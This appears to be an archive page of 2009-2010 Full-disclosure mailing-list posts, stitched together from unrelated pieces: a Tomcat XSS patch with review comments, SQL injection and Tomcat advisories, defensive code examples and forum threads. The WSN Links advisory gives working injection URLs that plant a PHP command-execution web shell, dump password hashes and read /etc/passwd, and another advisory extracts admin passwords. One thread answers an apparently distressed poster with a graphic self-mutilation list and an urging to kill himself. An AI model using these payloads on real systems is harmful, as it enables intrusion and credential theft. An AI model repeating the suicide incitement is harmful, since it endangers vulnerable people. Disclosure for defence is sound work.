No release date has been set for the next Tomcat 7.0.x and Tomcat 6.0.x
releases.

Credit:
The original issue was discovered by Adam Muntner of Gotham Digital Science.
Additional issues were identified by the Tomcat security team as a result of 
reviewing the original issue.

References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html

Note: The patches 
The Apache Tomcat Security Team



Patch for 6.0.29


Index: webapps/manager/WEB-INF/jsp/sessionDetail.jsp
===
- --- webapps/manager/WEB-INF/jsp/sessionDetail.jsp (revision 1037769)
+++ webapps/manager/WEB-INF/jsp/sessionDetail.jsp   (working copy)
@@ -30,8 +30,10 @@
 % String path = (String) request.getAttribute(path);
Session currentSession = (Session)request.getAttribute(currentSession);
HttpSession currentHttpSession = currentSession.getSession();
- -   String currentSessionId = currentSession.getId();
- -   String submitUrl = 
((HttpServletRequest)pageContext.getRequest()).getRequestURL().toString();
+   String currentSessionId = JspHelper.escapeXml(currentSession.getId());
+   String submitUrl = JspHelper.escapeXml(
+   ((HttpServletRequest) pageContext.getRequest()).getRequestURI() +
+   ?path= + path);
 %
 head
 meta http-equiv=content-type content=text/html; charset=iso-8859-1/
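Review bot: the new submitUrl line appends path to the query string raw (the `?path= + path` line) and relies on JspHelper.escapeXml alone; escapeXml covers the HTML attribute context but not URL syntax, so a path containing `&`, `#` or `%` would corrupt the query. Suggest URL-encoding path before the concatenation and then XML-escaping the whole URL as the patch already does. Also, escaping currentSessionId at its declaration means every later use must be treated as already escaped; a short comment on that declaration would stop a future double escapeXml.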
@@ -45,7 +47,7 @@
titleSessions Administration: details for %= currentSessionId 
%/title
 /head
 body
- -h1Details for Session %= JspHelper.escapeXml(currentSessionId) %/h1
+h1Details for Session %= currentSessionId %/h1
  table style=text-align: left; border=0
   tr
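Review bot: removing escapeXml from the h1 is correct only because currentSessionId is now escaped where it is declared; note that the unchanged title line at the top of this hunk also switches from raw to escaped output as a side effect, which deserves a mention in the commit message since the hunk otherwise reads like a pure refactor of the h1.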
@@ -54,7 +56,7 @@
   /tr
   tr
 thGuessed Locale/th
- -td%= JspHelper.guessDisplayLocaleFromSession(currentSession) %/td
+td%= 
JspHelper.escapeXml(JspHelper.guessDisplayLocaleFromSession(currentSession)) 
%/td
   /tr
   tr
 thGuessed User/th
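Review bot: the Guessed Locale value is now escaped, but the Guessed User row that starts at this hunk's last context line lies outside the patch, so these lines do not show whether its value gets the same escapeXml treatment; please confirm, since it is rendered from the same untrusted session data.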
@@ -120,7 +122,7 @@
String attributeName = (String) attributeNamesEnumeration.nextElement();
 %
tr
- - td align=centerform action=%= submitUrl 
%divinput type=hidden name=path value=%= path % /input 
type=hidden name=action value=removeSessionAttribute /input 
type=hidden name=sessionId value=%= currentSessionId % /input 
type=hidden name=attributeName value=%= attributeName % /input 
type=submit value=Remove //div/form/td
+   td align=centerform action=%= submitUrl 
%divinput type=hidden name=action value=removeSessionAttribute 
/input type=hidden name=sessionId value=%= currentSessionId % 
/input type=hidden name=attributeName value=%= 
JspHelper.escapeXml(attributeName) % /input type=submit value=Remove 
//div/form/td
td%= JspHelper.escapeXml(attributeName) %/td
td% Object attributeValue = 
currentHttpSession.getAttribute(attributeName); %span title=%= 
attributeValue == null ?  : attributeValue.getClass().toString() %%= 
JspHelper.escapeXml(attributeValue) %/span/td
/tr
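Review bot: the hidden path input is dropped in favour of carrying path in submitUrl's query string, but the form in these lines has no method attribute; with the default GET method a browser replaces the action URL's query component with the form's own fields, so path would be lost on submit. Either add method=post to the form or keep the hidden path input. Separately, the unchanged span title= line still emits attributeValue.getClass().toString() unescaped while the span body goes through escapeXml; escape the title value as well for consistency.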
Index: webapps/manager/WEB-INF/jsp/sessionsList.jsp


[Full-disclosure] 'Free Simple Software' SQL Injection Vulnerability (CVE-2010-4298)

2010-11-21 Thread Mark Stanislav
'Free Simple Software' SQL Injection Vulnerability (CVE-2010-4298)
Mark Stanislav - mark.stanis...@gmail.com


I. DESCRIPTION
---
A vulnerability exists in the 'Free Simple Software' download module which 
allows for a 'UNION SELECT' to easily expose the application administrator's 
plaintext password.

 
II. TESTED VERSION
---
1.0 [Manual Install Version]


III. PoC EXPLOIT
---
http://site.com/index.php?page=downloadsrequest=download_nowdownloads_id=' 
UNION SELECT email_address as name, NULL, NULL, password as file_name, 
last_name as file_url from admin_users where id!='NULL


IV. NOTES 
---
* User passwords for this web application are not encrypted or hashed which 
makes this exploit even more concerning.
* The PoC assumes that the first user is the administrative user which is the 
default behavior for the application.
* At least 1 download must already exist to enable this exploit.
* Due to a previous vulnerability not being fixed 3 months after disclosure 
(CVE-2010-3307), it's assumable that this application is not being actively 
developed.


V. SOLUTION
---
Do not utilize the download module. No patch/upgrade is available at this time.


VI. REFERENCES
---
http://www.freesimplesoft.com/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4298
https://www.uncompiled.com/2010/11/free-simple-software-sql-injection-vulnerability-cve-2010-4298/


VII. TIMELINE
---
11/12/2010: Initial disclosure e-mail to the vendor
11/21/2010: Public disclosure


[Full-disclosure] 'WSN Links' SQL Injection Vulnerability (CVE-2010-4006)

2010-10-31 Thread Mark Stanislav
'WSN Links' SQL Injection Vulnerability (CVE-2010-4006)
Mark Stanislav - mark.stanis...@gmail.com


I. DESCRIPTION
---
A vulnerability exists in the search.php code that allows for SQL injection of 
various parameters. By assembling portions of SQL code between the affected 
parameters, successful SQL injection into the software can occur. In the 
testing done, various 'UNION SELECT' SQL injections can occur. 

 
II. AFFECTED VERSIONS
---
< 6.0.1; < 5.1.51; < 5.0.81


III. TESTED VERSIONS
---
5.1.40 & 5.1.49


IV. PoC EXPLOITS 
---
1) A 'UNION SELECT' which results in a PHP shell-execution script
http://example.com/search.php?namecondition=IS%20NULL))%20UNION%20((SELECT%20?php%20system($_REQUEST[cmd]);%20?%20INTO%20OUTFILEnamesearch=/var/www/exec.phpaction=filterfilled=1whichtype=categories

2) A 'UNION SELECT' which results in a member's name, password hash, and e-mail 
to be extracted to a file
http://example.com/search.php?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%20concat(name,0x3a,password,0x3a,email)%20FROM%20wsnlinks_members%20INTO%20OUTFILEnamesearch=/var/www/pass.txtaction=filterfilled=1whichtype=categories

3) A 'UNION SELECT' which results in the /etc/passwd file being copied to a web 
directory file
http://example.com/search.php?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%20load_file(0x2f6574632f706173737764)%20INTO%20OUTFILEnamesearch=/var/www/passwd.txtaction=filterfilled=1whichtype=categories


V. NOTES 
---
* The above exploits require 'FILE' SQL privilege as well as poor web directory 
permissions to work. 
* Only 'namecondition' and 'namesearch' are utilized for the actual SQL 
injection.
* There is potential to exploit this vulnerability which outputs user data 
directly to the browser.
* Passing 'debug=1' as a query value easily enables debug mode of tested 'WSN 
Links' deployments.


VI. SOLUTION
---
Upgrade to the most recent version of your 'WSN Links' code branch.


VII. REFERENCES
---
http://www.wsnlinks.com/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4006
http://www.uncompiled.com/2010/10/wsn-links-sql-injection-vulnerability-cve-2010-4006/

VIII. TIMELINE
---
10/10/2010: Initial disclosure e-mail to the vendor
10/18/2010: Follow-up via the vendor's contact web form
10/18/2010: Vendor acknowledgement/commitment to fix
10/21/2010: Patched versions released
10/31/2010: Public disclosure
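Both this advisory and the Free Simple Software one above come down to attacker-controlled request values being spliced into SQL text. As an added example (constructed for this page in Python with sqlite3 rather than the applications' PHP/MySQL, with an invented two-table schema, not either vendor's code), here is the concatenated query beside the bound-parameter version, and, because the Free Simple Software notes flag plaintext passwords, a salted hash so that a dump of the users table no longer yields passwords.

```python
import hashlib
import hmac
import os
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the tables the advisories name (constructed
    schema and rows; neither application's real schema is reproduced).
    The admin password is stored in the clear, as the advisory notes."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE downloads (
            id INTEGER PRIMARY KEY, name TEXT, file_name TEXT, file_url TEXT);
        CREATE TABLE admin_users (
            id INTEGER PRIMARY KEY, email_address TEXT, last_name TEXT,
            password TEXT);
        INSERT INTO downloads VALUES
            (1, 'Manual', 'manual.pdf', '/files/manual.pdf');
        INSERT INTO admin_users VALUES
            (1, 'admin@example.invalid', 'Admin', 'hunter2');
    """)
    return con


def download_vulnerable(con: sqlite3.Connection, downloads_id: str):
    """The shape of the bug: the request parameter becomes part of the SQL
    text, so a quote inside it ends the literal and the remainder is parsed
    as SQL (a UNION SELECT can then read any table, as the PoC shows)."""
    sql = ("SELECT name, file_name, file_url FROM downloads "
           "WHERE id = '" + downloads_id + "'")
    return con.execute(sql).fetchall()


def download_fixed(con: sqlite3.Connection, downloads_id: str):
    """Fix: the id is validated as an integer and passed as a bound
    parameter; whatever it contains, it can never alter the statement."""
    try:
        id_int = int(downloads_id)
    except ValueError:
        return []
    return con.execute(
        "SELECT name, file_name, file_url FROM downloads WHERE id = ?",
        (id_int,)).fetchall()


def hash_password(password: str, salt: bytes = b"") -> str:
    """Salted PBKDF2-HMAC-SHA256, stored as hex(salt)$hex(digest).
    A fresh random salt is drawn when none is supplied."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt.hex() + "$" + digest.hex()


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), 200_000)
    return hmac.compare_digest(digest.hex(), digest_hex)
```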


Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Mark Byrne
It's impossible for anyone on this mailing list to know if the attack is
personal or not, unless they are actually involved in the attack. Use a
password such as 7%Ônç#®]�...@ãnÝèÅ#çñ] and watch them hack away to their
heart's content.

On 17/06/2010 13:48, Gary Baribault wrote:
 Hello list,
 
 I have a strange situation and would like information from the
 list members. I have three Linux boxes exposed to the Internet. Two of
 them are on cable modems, and both have two services that are publicly
 available. In both cases, I have SSH and named running and available
 to the public. Before you folks say it, yes I run SSH on TCP/22 and no
 I don't want to move it to another port, and no I don't want to
 restrict it to certain source IPs.
 
 Both of these systems are within one /21 and get attacked
 regularly. I run Denyhosts on them, and update the central server once
 an hour with attacking IPs, and obviously also download the public
 hosts.deny list.
 
 These machines get hit regularly, so often that I don't really
 care, it's fun to make the script kiddies waste their time! But in
 this instance, only my home box is being attacked... someone is
 burning a lot of cycles and hosts to do a distributed dictionary
 attack on my one box! The named daemon is non recursive, properly
 configured, up to date and not being attacked.
 
 Is anyone else seeing this type of attack? Or is someone really
 targeting MY box?
 
 Thanks
 
 
 Gary Baribault
 Courriel: g...@baribault.net
 GPG Key: 0x685430d1
 Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
 


[Full-disclosure] Call for participation -- Eth0:2010 Summer

2010-04-22 Thread Mark Janssen
Hello,

Included below is the Call for Papers / Participation of Eth0:2010 Summer.

We hope you will be interested in presenting at our conference.

Please feel free to forward this message to anyone who you think can add
interesting content to our conference. We hope to see you all this summer
in Wieringerwerf.

The Eth0:2010 Summer Program Committee
prog...@eth-0.nl


== eth0:2010 -- Call for Papers / Participation ==

Tuesday August 10th to Friday August 13th 2010
Location: Het Boshuis, Wieringerwerf, Netherlands
http://www.eth-0.nl

== Important Dates ==

Submission deadline for contributions   July 1st
Earliest acceptance notification        July 5th
Latest notification of acceptance       July 19th
Schedule completed                      August 1st

== About eth0:2010 ==

A conference and summer camp for hackers, developers and internet residents
Organised by the eth0 foundation and supported by the Hxx foundation
In 'Het Boshuis', Wieringerwerf, North-Holland, the Netherlands.

eth0 is searching for lectures, speeches and performances; we will host
discussions, workshops and presentations.

== Subjects ==

The following subjects are considered interesting and relevant for eth0:
* Privacy
* Security
* Ethical hacking
* Hackerspaces
* Open Source
* Open Technologies
* Politics regarding Piracy, Copyright and Intellectual Property
* Bio-Hacking
* ...

== Submissions ==

All entries must be submitted to us by using the webform at: 
http://eth-0.nl/cfp.php

We will be needing:
* Your name, nickname or pseudonym
* The title of your submission
* A short bio of you or your group
* Optionally, a picture of you / your group
* A short (150 words max) summary/description of your subject
* A detailed description of your subject
* Any requirements (audio/video resources, whiteboard etc)
* Contact e-mail address
* Whether you want to do a lightning talk (10 min max), a lecture (45 minutes) or a 
workshop (longer, hands-on)
* Language of your presentation (Dutch or English are accepted)

== Location and Technology ==

eth0 will provide the following equipment at the lecture tent:
* 230V AC power
* A video projector with VGA d-sub connection
* Projection screen
* Wireless Microphone
* Audio Line-in connection (for your laptop)
* Video and audio recording of your presentation

Should you need anything not listed here, please make a note of this in
your submission and we will try to accommodate this as far as possible.
If you do not want your presentation recorded (and/or put online) please
let us know beforehand.

== Reimbursement ==

eth0:2010 is a non-profit event and the lecturers are not paid. It is
unfortunately not possible for us to reimburse travel and accommodation fees.

We hope to see you at Eth0:2010 Summer.

The Program Committee

Aldert Hazenberg
Erik Bosman
Jeroen Dekkers
Mark Janssen



Re: [Full-disclosure] The feeling of being followed is horrible. Need freedom from survellience. Please god help.

2010-03-21 Thread Mark Byrne
On 21/03/2010 19:01, Benji wrote:
 1) Acquire a knife
 2) Acquire a lighter
 3) Gouge face until you do not recognise self.
 4) Acquire a shaver
 5) Shave hair off
 6) Cut ears off
 7) Acquire plyers
 8) Yank all teeth out
 9) Walk to a bridge above water, attach shakles to legs
 10) Gouge eyes out with knife
 11) Burn finger tips off
 12) Jump
 
 On Sun, Mar 21, 2010 at 5:38 PM, Andrew Walberg
 andrew.walb...@rocketmail.com mailto:andrew.walb...@rocketmail.com
 wrote:
 
 I need more control of my life. I don't know why I got people
 following me and pointing out my car in my parking lot, but they are
 planning some plot. I don't know what they're thinking but they're
 probably building up more conspiracy theories about me.
 
 Perhaps its because of posts I made on here that made them curious.
 It's only a matter of time until it intensifies.
 
 I can't take this. I already had this happen to me in the last city
 I lived in. They took all this ambigious garbage and soon as you
 know I have friends asking if I do drugs, going into my medicine
 cabinets, asking if I'm a hacker. etc.
 
 I can't live a life like this guys.
Do yourself and everyone else a favour and kill yourself.
And to the rest of the members of this mailing list. Read basic
psychology. If someone needs attention and you give it to them, they'll
be back for more. If you ignore them, they'll go somewhere else to play
their stupid, childish games.



 I just need to feel more anonymous. Not necessarily underground, but
 I need to be able to live free without survellience.
 
 Does living in the big city give you more anonymity?
 
 Someone please god help.
 
 I need ideas. I'm not a criminal. I've done nothing wrong. Give me tips.
 
 
 __
 Do You Yahoo!?
 Sie sind Spam leid? Yahoo! Mail verfügt über einen herausragenden
 Schutz gegen Massenmails.
 http://mail.yahoo.com


Re: [Full-disclosure] The feeling of being followed is horrible. Need freedom from survellience. Please god help.

2010-03-21 Thread Mark Byrne
I don't disagree with you. But this mailing list has, over the last 6 
months or so (at least) been full of immature script-kiddy dicks who, I 
honestly believe, would not come back if we were to pay them no 
attention at all. After all, their need is not knowledge, it's attention.

On 21/03/2010 23:34, Christian Sciberras wrote:
 You might want to consider that every mailing list have its own court
 jester. ;)

 On Sun, Mar 21, 2010 at 11:25 PM, Mark Byrne boogiebr...@yahoo.co.uk
 mailto:boogiebr...@yahoo.co.uk wrote:

 On 21/03/2010 19:01, Benji wrote:
   1) Acquire a knife
   2) Acquire a lighter
   3) Gouge face until you do not recognise self.
   4) Acquire a shaver
   5) Shave hair off
   6) Cut ears off
   7) Acquire plyers
   8) Yank all teeth out
   9) Walk to a bridge above water, attach shakles to legs
   10) Gouge eyes out with knife
   11) Burn finger tips off
   12) Jump
  
   On Sun, Mar 21, 2010 at 5:38 PM, Andrew Walberg
   andrew.walb...@rocketmail.com
 mailto:andrew.walb...@rocketmail.com
 mailto:andrew.walb...@rocketmail.com
 mailto:andrew.walb...@rocketmail.com
   wrote:
  
   I need more control of my life. I don't know why I got people
   following me and pointing out my car in my parking lot, but
 they are
   planning some plot. I don't know what they're thinking but
 they're
   probably building up more conspiracy theories about me.
  
   Perhaps its because of posts I made on here that made them
 curious.
   It's only a matter of time until it intensifies.
  
   I can't take this. I already had this happen to me in the
 last city
   I lived in. They took all this ambigious garbage and soon as you
   know I have friends asking if I do drugs, going into my medicine
   cabinets, asking if I'm a hacker. etc.
  
   I can't live a life like this guys.
 Do yourself and everyone else a favour and kill yourself.
 And to the rest of the members of this mailing list. Read basic
 psychology. If someone needs attention and you give it to them, they'll
 be back for more. If you ignore them, they'll go somewhere else to play
 their stupid, childish games.



   I just need to feel more anonymous. Not necessarily
 underground, but
   I need to be able to live free without survellience.
  
   Does living in the big city give you more anonymity?
  
   Someone please god help.
  
   I need ideas. I'm not a criminal. I've done nothing wrong.
 Give me tips.
  
  
   __
   Do You Yahoo!?
   Sie sind Spam leid? Yahoo! Mail verfügt über einen herausragenden
   Schutz gegen Massenmails.
   http://mail.yahoo.com


Re: [Full-disclosure] Ubuntu Lucid Lynx is Big brother Ubuntu

2010-02-28 Thread Mark Shuttleworth
On 26/02/10 19:55, John Q Public wrote:
 Well considering the tone I used, Frankly, I'm surprised you even
 dignified that. I don't always speak in such a tone. It's just the
 atmosphere of the scene here.

 I want my system here to be pure and free. No blogcruft.

 Remember how XP and Vista would always come with Windows Messenger?
 It's the same philosophical issue.

 It integrates social networking too closely, and it makes me wanna
 go into FUD mode. I'm scared here.

 I'm worried to be stuck with a LTS desktop for 4 years with an
 experiment that should be done in the _NEXT_ 6mos, in a non-LTS.


 I appreciate it Mr. Shuttleworth. Our Linux communities are one of
 the brighter beacons of efficient development out there.

 Keep up the steamrolling Ubunteros.

Well, a little constructive paranoia is a good thing, to keep everyone
aware of the risks of abuse. We do have a big responsibility to keep
moving forward, even though there is no certainty about what the future
looks like, and that involves some risk.

The best way I think you can help, is to try the new bits out, and give
good feedback in a way that helps people understand what you really
mean, and how best to balance that with everyone else's feedback too.

All the best,
Mark



Re: [Full-disclosure] Yahoo! UK and US Hiring Security and Risk management experts

2010-02-28 Thread mark seiden
yet another nice troll with a stylistic stench of n3td3v about it,  judging by 
the fanciful misconceptions surrounding a kernel of truth
(and the phony attribution to someone to whom he's taken an unreasonable
disliking...)

it's true that yahoo is hiring security people, though, typically not as 
consultants
but as employees -- programmers and engineers who are clueful about 
security.  

careers.yahoo.com is a good way, in fact,  to find out about those jobs.  at 
rough count
50 jobs in the US (mostly bay area) with the word security in their abstract, 
and a 
sizeable number in india, asia, and europe accessible off separate links.

also, there are particularly numerous jobs for service engineering pros, 
people who are good at production services delivery at a very large scale.

if there are qualified applicants on this list (or your friends) who want their 
name put
in for something particular, happy to refer them (i'd even get a referral 
incentive).

btw, please mention the  specific posted position(s) that you think would suit 
you.

(you don't have to be 25-35.  in fact, such a requirement would not be
legal under US labor law...).


On Feb 27, 2010, at 9:25 AM, Henri Torgemane wrote:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1
 
 
 http://careers.yahoo.com/
 
 Looking for a dream job?
 
 Yahoo! is hiring security consultants worldwide 25-35 to help join
 our new Cyber Security Task Force.
 
 We are working with the government to provide a security service
 for our web and messenger platforms. Especially people with
 experience harvesting vital intelligence, which is the life blood
 of our security system. All aspects of security, risk management,
 analysis. We embody the paranoid, professional spirit of
 corporatism. With delight (and muffins!)
 
 At Yahoo!, big thinking comes with the territory. When your work
 reaches over half a billion users--that's 1 out of every 2 people
 online--there's no small task. We need creative minds that can take
 us new places. Individuals who want to positively impact their
 career--and the world at large. We're looking for Big Thinkers who
 embody the fun, innovative, collaborative spirit that's uniquely
 Yahoo!.
 
 We're looking for people like you. To protect it.
 
 I look forward to seeing your applications. Let's protect our data.
 Let's create the future, together.
 
 Henri Torgemane
 


Re: [Full-disclosure] Ubuntu Lucid Lynx is Big brother Ubuntu

2010-02-26 Thread Mark Shuttleworth
On 25/02/10 22:28, John Q Public wrote:
 wtf is this.

 A centralized identity system?

 In an open source operating system? By default?

 You're going overboard here. You're just a rich trustfunder and
 your proles are afraid to say you're making a huge error.

Just a tip: when you're giving advice that you want to be heard, try not
to insult the other guy before you get to the advice ;-)

 I never asked for my OS to become this big chatroom filled with a
 bunch of autistic, idiotic facebook kids. I can't stand that.

Look, you can't expect me to be accountable for who you follow on
Twitter, or who your Facebook friends are. Nothing's going to show up on
your desktop that you didn't sign up for.

 Ubuntu one? Chatroom accounts? Online, Invisible? You're turning
 the default Ubuntu into your huge autistic chatroom.

We're bringing social interaction from the web, into the desktop. We're
breathing life back into the city center, as it were. We're making the
desktop more human. This is our mission, our reason for loving what we
do. I'm sorry if it offends you, but it's got many people in the
community very excited. There's no commercial conflict of interests here
- we're putting it in by default purely to delight users. I accept that
you're not delighted, but I don't see any signs that this won't be one
of the favorite things about the release, for most users.

If it turns out not to be the case, either before or after we make the
release, we can course-correct in six months' time.

 Disable this, or name it teenbuntu.

I'm not sure why you think you can issue orders to me.

 You are integrating this immature stuff into a Long Term Support
 version of Ubuntu.

Yes. The Ubuntu team won't integrate it if they don't think it's ready.
They wanted it for 9.10, but it wasn't ready. Now it may be so. Please
do file bugs, and thank you for the feedback. If the general feedback we
get, including yours, suggests it's not right or not ready, it won't ship.

 Desktop or not, I don't want to be forced into
 your schema and big brother social tray icon. Remove it by
 default. Make it available via the software center.

 Please fix this, you're making a big mistake. Other than that, I'm
 extremely excited for Lucid Lynx.

Well, you can remove it yourself. And I won't be offended if you do.

Thanks for the feedback, keep happy,
Mark

[Full-disclosure] [SECURITY] CVE-2009-2901 Apache Tomcat insecure partial deploy after failed undeploy

2010-01-24 Thread Mark Thomas
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CVE-2009-2901: Apache Tomcat insecure partial deploy after failed undeploy

Severity: Low

Vendor:
The Apache Software Foundation

Versions Affected:
Tomcat 5.5.0 to 5.5.28
Tomcat 6.0.0 to 6.0.20
The unsupported Tomcat 3.x, 4.x and 5.0.x versions may also be
affected.

Description:
By default, Tomcat automatically deploys any directories placed in a
host's appBase. This behaviour is controlled by the autoDeploy attribute
of a host which defaults to true. After a failed undeploy, the remaining
files will be deployed as a result of the autodeployment process.
Depending on circumstances, files normally protected by one or more
security constraints may be deployed without those security constraints,
making them accessible without authentication.

Mitigation:
6.0.x users should upgrade to 6.0.24 or apply this patch:
http://svn.apache.org/viewvc?rev=892815&view=rev
5.5.x users should upgrade to 5.5.29 when released or apply this patch:
http://svn.apache.org/viewvc?rev=902650&view=rev
Note: the patches also address CVE-2009-2693 and CVE-2009-2902.
Alternatively, users of all Tomcat versions may mitigate this issue by
manually ensuring that an undeploy removes all files. If one or more
files cannot be deleted, it may be necessary to stop Tomcat before the
files can be deleted.

Credit:
This issue was discovered by the Apache Tomcat security team

References:
[1] http://tomcat.apache.org/security.html

Mark Thomas




[Full-disclosure] [SECURITY] CVE-2009-2693 Apache Tomcat unexpected file deletion and/or alteration

2010-01-24 Thread Mark Thomas
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CVE-2009-2693: Apache Tomcat unexpected file deletion and/or alteration

Severity: Low

Vendor:
The Apache Software Foundation

Versions Affected:
Tomcat 5.5.0 to 5.5.28
Tomcat 6.0.0 to 6.0.20
The unsupported Tomcat 3.x, 4.x and 5.0.x versions may also be
affected.

Description:
When deploying WAR files, the WAR files were not checked for directory
traversal attempts. This allows an attacker to create arbitrary content
outside of the web root.

Mitigation:
6.0.x users should upgrade to 6.0.24 or apply this patch:
http://svn.apache.org/viewvc?rev=892815&view=rev
5.5.x users should upgrade to 5.5.29 when released or apply this patch:
http://svn.apache.org/viewvc?rev=902650&view=rev
Note: the patches also address CVE-2009-2901 and CVE-2009-2902.
Alternatively, users of all Tomcat versions may mitigate this issue by
manually validating the contents of untrusted WAR files before deployment.

Example:
A WAR file that contains the following entry will overwrite the standard
Windows start-up script when deployed on a default Tomcat installation:
../../bin/catalina.bat

Credit:
This issue was reported to the Apache Tomcat security team by Marc
Schoenefeld of the Red Hat Security Response Team

References:
[1] http://tomcat.apache.org/security.html

Mark Thomas




[Full-disclosure] [SECURITY] CVE-2009-2902 Apache Tomcat unexpected file deletion in work directory

2010-01-24 Thread Mark Thomas
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CVE-2009-2902: Apache Tomcat unexpected file deletion in work directory

Severity: Low

Vendor:
The Apache Software Foundation

Versions Affected:
Tomcat 5.5.0 to 5.5.28
Tomcat 6.0.0 to 6.0.20
The unsupported Tomcat 3.x, 4.x and 5.0.x versions may also be
affected.

Description:
When deploying WAR files, the WAR file names were not checked for
directory traversal attempts. This allows an attacker to cause the
deletion of the current contents of the host's work directory which may
cause problems for currently running applications.

Mitigation:
6.0.x users should upgrade to 6.0.24 or apply this patch:
http://svn.apache.org/viewvc?rev=892815&view=rev
5.5.x users should upgrade to 5.5.29 when released or apply this patch:
http://svn.apache.org/viewvc?rev=902650&view=rev
Note: the patches also address CVE-2009-2693 and CVE-2009-2901.
Alternatively, users of all Tomcat versions may mitigate this issue by
manually validating the contents of untrusted WAR files before deployment.

Example:
Deploying and undeploying a WAR named ...war causes all files and
subdirectories in work/<engine name>/<host name> to be removed.

Credit:
This issue was discovered by the Apache Tomcat security team

References:
[1] http://tomcat.apache.org/security.html


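Both the CVE-2009-2693 and the CVE-2009-2902 advisories recommend manually
validating untrusted WAR files before deployment. The following Java program is
an added example of that check and is not code from the Tomcat project or from
the advisories. It rejects a WAR whose file name would give a context name of
".." (the "...war" case from CVE-2009-2902) and lists every entry that would be
written outside the web application's docBase when the archive is expanded (the
"../../bin/catalina.bat" case from CVE-2009-2693). It goes beyond the single
examples in the advisories by canonicalising every entry path against the
docBase. The docBase path and the in-memory WARs are constructed for the
example and the directory does not need to exist.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;
import java.util.zip.ZipOutputStream;

public class WarValidator {

    // Tomcat derives the context name by stripping ".war" from the file name,
    // so "...war" becomes "..", which maps onto the parent of the host's
    // work directory.
    static boolean warNameIsSafe(String fileName) {
        if (!fileName.endsWith(".war")) {
            return false;
        }
        String context = fileName.substring(0, fileName.length() - 4);
        return !context.isEmpty()
                && !context.equals(".") && !context.equals("..")
                && context.indexOf('/') < 0 && context.indexOf('\\') < 0;
    }

    // Returns the entries that would be written outside docBase when the WAR
    // is expanded: absolute names, and names whose canonical path leaves
    // docBase once "." and ".." segments are resolved.
    static List<String> unsafeEntries(byte[] war, File docBase) throws IOException {
        List<String> bad = new ArrayList<String>();
        String root = docBase.getCanonicalPath() + File.separator;
        ZipInputStream zin = new ZipInputStream(new ByteArrayInputStream(war));
        try {
            ZipEntry e;
            while ((e = zin.getNextEntry()) != null) {
                String name = e.getName();
                String canonical = new File(docBase, name).getCanonicalPath();
                if (new File(name).isAbsolute() || !canonical.startsWith(root)) {
                    bad.add(name);
                }
            }
        } finally {
            zin.close();
        }
        return bad;
    }

    // Builds an in-memory WAR with the given entry names (constructed test data).
    static byte[] buildWar(String... entryNames) throws IOException {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ZipOutputStream zout = new ZipOutputStream(baos);
        for (String name : entryNames) {
            zout.putNextEntry(new ZipEntry(name));
            zout.write("x".getBytes(StandardCharsets.US_ASCII));
            zout.closeEntry();
        }
        zout.close();
        return baos.toByteArray();
    }

    public static void main(String[] args) throws IOException {
        // Assumed docBase of a default install; only the path string matters.
        File docBase = new File("/opt/tomcat/webapps/app");
        byte[] good = buildWar("WEB-INF/web.xml", "index.jsp");
        // The entry from the CVE-2009-2693 advisory.
        byte[] evil = buildWar("WEB-INF/web.xml", "../../bin/catalina.bat");

        System.out.println("good WAR unsafe entries: " + unsafeEntries(good, docBase));
        System.out.println("evil WAR unsafe entries: " + unsafeEntries(evil, docBase));
        System.out.println("app.war name safe: " + warNameIsSafe("app.war"));
        System.out.println("...war name safe:  " + warNameIsSafe("...war"));
    }
}
```

Run it before copying a WAR into appBase; a non-empty result from
unsafeEntries, or a false from warNameIsSafe, means the archive must not be
deployed on an unpatched Tomcat. The prefix check uses the canonical docBase
with a trailing separator so that a sibling directory such as
webapps/app2 is not mistaken for a path inside webapps/app.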

Re: [Full-disclosure] Google today

2010-01-17 Thread Mark Jeanmougin
I think it means you need to stop using IE.  :)

Seriously, when I go there, everything looks normal.

MJ


 Thor (Hammer of God) t...@hammerofgod.com 1/15/2010 14:20 
I know google likes to do clever Today themes, but what's this one supposed 
to mean? :D



Timothy (Thor) Mullen
t...@hammerofgod.com 
www.hammerofgod.com 






[Full-disclosure] TomaHawk IPS testing tool + [files]

2009-06-25 Thread Mark Sec
Alo ,

Does anyone know where I can download the original install scripts?

1) qa.tgz
2) pcaps.tgz
3) www.tgz

I have this mirror, but it doesn't have the www.tgz file; the other files work:
http://www.mirrorservice.org/sites/download.sourceforge.net/pub/sourceforge/t/to/tomahawk/

According to Tomahawk's page, you must follow these instructions:
http://www.tomahawktesttool.org/install.html

I have a Fedora 10 virtual box; if anyone has more experience using this tool
over VMware, please post.
Also, does anyone know a better tool than Tomahawk to stress an IDS/IPS,
something more efficient? Please post.

-mark :-)

Re: [Full-disclosure] apache and squid dos

2009-06-22 Thread Mark Sec
$php -f dos.php 1 localhost
PHP Fatal error:  Call to undefined function pcntl_fork() in
C:\Users\Administrador\Desktop\dos.php on line 68

Mmm, it doesn't work! :-/

-mark



2009/6/20 Lolek of TK53 lolek1...@googlemail.com

 On Fri, Jun 19, 2009 at 8:00 PM, evilrabbievilra...@gmail.com wrote:
  Exploit for new apache and squid dos mentioned on sans..
 
  <?php
  /*
  DOS for the vulnerability at
 http://isc.sans.org/diary.html?storyid=6601
 
 
